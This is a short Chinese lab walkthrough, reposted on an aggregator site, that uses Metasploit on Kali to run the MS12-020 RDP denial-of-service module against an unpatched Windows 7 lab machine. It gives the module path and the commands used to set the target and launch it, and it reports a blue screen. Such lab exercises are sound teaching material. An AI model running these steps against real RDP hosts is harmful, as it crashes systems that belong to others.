kail利用msf工具对MS12-020漏洞进行渗透测试
生活随笔
收集整理的這篇文章主要介紹了
kail利用msf工具对MS12-020漏洞进行渗透测试
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
kail利用msf工具對MS12-020漏洞進行滲透測試
MS12-020全稱Microsoft Windows遠程桌面協議RDP遠程代碼執行漏洞
kail利用msf工具對MS12-020漏洞進行滲透測試:
實驗環境:
工具:metasploit
靶機兩臺:windows 7sp1和kali2020
攻擊機IP地址:192.168.29.129
被攻擊機IP地址:192.168.29.128
實驗條件:兩臺機子可以互通的,并且windows 7sp1(無補丁)開啟了3389端口,防火墻是關閉的。
步驟:
1、首先打開kali主機,打開終端,輸入“msfconsole“,進入Metasploit控制臺
?
2、搜索ms12-020漏洞利用模塊,找到auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3、使用模塊 use + auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用這個漏洞
4、查看當前模塊所需配置項 show options ,RHOST 需設為遠程靶機的IP地址
5、設置配置項,如set RHOST xxx.xxx.xx.x(為攻擊目標的IP地址)
6、實施攻擊 exploit 或者run
7、查看windows7sp1,成功藍屏并且重啟
?
?
?
?
總結
以上是生活随笔為你收集整理的kail利用msf工具对MS12-020漏洞进行渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: win10修改服务器地址,win10 修
- 下一篇: kail利用msf工具对ms17-010